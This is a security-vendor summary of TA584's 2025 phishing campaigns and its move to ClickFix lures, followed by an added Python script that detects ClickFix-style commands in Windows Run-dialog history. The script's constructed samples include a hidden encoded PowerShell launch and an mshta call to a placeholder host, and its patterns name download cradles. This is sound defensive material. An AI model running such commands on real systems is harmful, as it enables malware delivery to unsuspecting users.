Can't Stop, Won't Stop: TA584 Innovates Initial Access
TA584 is one of the most prominent cybercriminal threat actors tracked by Proofpoint threat researchers. In 2025, the actor demonstrated multiple attack chain changes, including expanded global targeting, ClickFix social engineering, and delivery of new malware, Tsundere Bot. TA584's activity is unique in the cybercrime landscape and shows that static detections alone are not reliable against constantly innovating threat actors.

Proofpoint tracks multiple sophisticated cybercriminal threat actors, and one of the most consistently active, running high-volume campaigns, is TA584. TA584 is a prominent initial access broker (IAB) that targets organizations globally. The actor's operational tempo increased throughout 2025, with the number of monthly campaigns tripling from March to December 2025.
While TA584 has been tracked for several years, its earlier campaigns followed relatively predictable patterns compared to the variety of techniques observed in 2025. One of the most notable shifts in TA584's activity during 2025 is how quickly campaigns are launched, modified, and retired. Compared with earlier years, 2025 activity is characterized by high campaign churn and short operational lifespans. Instead of refining a single successful attack chain, TA584 favors continuous iteration, rapidly cycling through various tactics, techniques, and procedures (TTPs), even when prior campaigns remained effective. The consistency of this pattern throughout 2025 shows how a steady stream of brief, thematically distinct campaigns originating from the same actor provides insight into how modern financially motivated threat actors adapt to defensive pressure.
TA584 sends emails impersonating various organizations. Impersonated entities include job-related firms (such as Michael Page and Adecco), business services (BBB, Companies House), and brands like PayPal, OSHA, Medicare, OneDrive, or YourCostSolutions. The most frequently impersonated vertical is healthcare, followed by government entities. TA584's social engineering content is distinctive, drawing on a very wide range of themes and techniques to get people to engage with malicious content. The emails and associated landing pages always match, with well-designed and believable lures. In several cases, brand selection appears aligned with geographic targeting, with localized or regionally relevant brands used to increase credibility among specific recipients. One campaign in December used a unique social engineering technique: including in the email lure a photo of an alleged package delivery bearing the recipient's name. In the emails, TA584 included a photo of supposed physical mail that displayed the target's name and address, customized to each recipient. Proofpoint rarely observes this technique; however, we have seen it used by TA2725 in recent months.
TA584 uses multiple delivery methods via email. In 2025, the actor most often sent emails from compromised individual senders. The emails usually contain unique links for each target that perform geofencing and IP filtering. Between March 2021 and July 2025, the landing page featured a countdown, the target's name (taken from a query parameter in the URL), and a CAPTCHA. Solving the CAPTCHA revealed a download button for a zipped JavaScript or shortcut (.lnk) file. From late July 2025, the actor switched to using the ClickFix technique. The ClickFix social engineering technique uses dialog boxes containing fake error messages to trick people into copying, pasting, and running malicious content on their own computer. First observed in 2024, the ClickFix technique is now used by many different threat actors, who customize the landing pages based on lure theme and objective.
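Because ClickFix depends on the victim pasting a command into something like the Windows Run dialog, one low-cost detection is to review the Run-dialog history that Windows keeps under `HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU` and flag entries that invoke a script interpreter with hidden-window, encoded-command, policy-bypass or remote-URL indicators. The script below is an added example written for this summary; it is not Proofpoint code and does not reproduce any TA584 command. The `SAMPLE_RUNMRU` entries are constructed, the host `example.invalid` is a placeholder, and the indicator patterns are generic heuristics rather than signatures for this actor.

```python
"""Scan exported RunMRU (Windows Run-dialog history) values for ClickFix-style
commands. Added example, not from the Proofpoint article; sample data is constructed."""
import ntpath
import re
from typing import Dict, List, Optional

# Constructed RunMRU value data. Real RunMRU values carry a trailing "\1" marker.
SAMPLE_RUNMRU: List[str] = [
    "notepad\\1",
    "\\\\fileserver\\share\\1",
    # constructed: interpreter launched hidden with an encoded command (fake base64)
    "powershell -w hidden -ep bypass -enc UwBhAG0AcABsAGUAIABvAG4AbAB5AA==\\1",
    # constructed: interpreter pointed at a placeholder remote URL
    "mshta http://example.invalid/captcha-verify\\1",
    "calc\\1",
]

# Interpreters a pasted ClickFix command typically starts with (generic list, an assumption).
INTERPRETERS = {
    "powershell", "pwsh", "mshta", "cmd", "wscript", "cscript",
    "curl", "certutil", "bitsadmin",
}

# Generic indicators that make an interpreter launch from the Run box suspicious.
INDICATORS: Dict[str, re.Pattern] = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.I),
    "encoded_command": re.compile(r"-e(?:nc(?:odedcommand)?)?\s+[A-Za-z0-9+/=]{16,}", re.I),
    "policy_bypass": re.compile(r"-e(?:xecution)?p(?:olicy)?\s+bypass", re.I),
    "remote_url": re.compile(r"https?://", re.I),
    "download_cradle": re.compile(r"\b(?:iwr|invoke-webrequest|downloadstring|urlcache)\b", re.I),
}


def strip_runmru(value: str) -> str:
    """Drop the trailing "\\1" marker that RunMRU appends to each stored command."""
    return value[:-2] if value.endswith("\\1") else value


def interpreter_of(cmd: str) -> Optional[str]:
    """Return the interpreter name if the command's first token is one, else None.
    Splits on whitespace, so a quoted path containing spaces is not resolved (kept simple)."""
    parts = cmd.split(maxsplit=1)
    if not parts:
        return None
    base = ntpath.basename(parts[0].strip('"')).lower()
    if base.endswith(".exe"):
        base = base[:-4]
    return base if base in INTERPRETERS else None


def score_run_entry(value: str) -> Dict[str, object]:
    """Classify one RunMRU value: which interpreter, which indicators, and a verdict."""
    cmd = strip_runmru(value).strip()
    interpreter = interpreter_of(cmd)
    hits = [name for name, rx in INDICATORS.items() if rx.search(cmd)]
    return {
        "command": cmd,
        "interpreter": interpreter,
        "indicators": hits,
        # An interpreter alone is common; interpreter plus any indicator is worth triage.
        "suspicious": interpreter is not None and bool(hits),
    }


def scan_runmru(values: List[str]) -> List[Dict[str, object]]:
    """Return only the entries that warrant analyst review, in original order."""
    return [r for r in (score_run_entry(v) for v in values) if r["suspicious"]]


if __name__ == "__main__":
    for finding in scan_runmru(SAMPLE_RUNMRU):
        print(f"[{finding['interpreter']}] {finding['indicators']}: {finding['command']}")
```

The Run dialog is only one paste target; the same heuristics apply to PowerShell's `ConsoleHost_history.txt` and to process-creation telemetry where the parent is `explorer.exe`, which is the more reliable source on endpoints with EDR. Treat a hit as a triage lead, not a conviction: administrators do sometimes paste encoded one-liners.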
To read the complete article see: Proofpoint Threat Insight
🌐 Source: Proofpoint